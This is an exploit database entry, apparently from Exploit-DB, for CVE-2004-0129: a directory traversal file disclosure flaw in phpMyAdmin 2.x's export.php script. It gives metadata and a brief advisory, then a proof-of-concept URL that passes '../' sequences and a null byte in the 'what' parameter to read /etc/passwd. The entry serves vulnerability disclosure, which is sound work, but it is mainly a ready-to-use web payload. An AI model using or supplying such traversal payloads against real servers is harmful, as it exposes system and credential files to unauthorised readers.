phpMyAdmin 2.x - 'Export.php' File Disclosure

Author: Cedric Cochin
type: webapps
platform: php
port: 
date_added: 2004-02-03 
date_updated: 2012-12-24 
verified: 1 
codes: CVE-2004-0129;OSVDB-3800 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/9564/info

phpMyAdmin is prone to a vulnerability that may permit remote attackers to gain access to files that are readable by the hosting web server. The issue is reported to exist in the 'export.php' script and may be exploited by providing directory traversal sequences as an argument for a specific URI parameter.

http://www.example.com/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00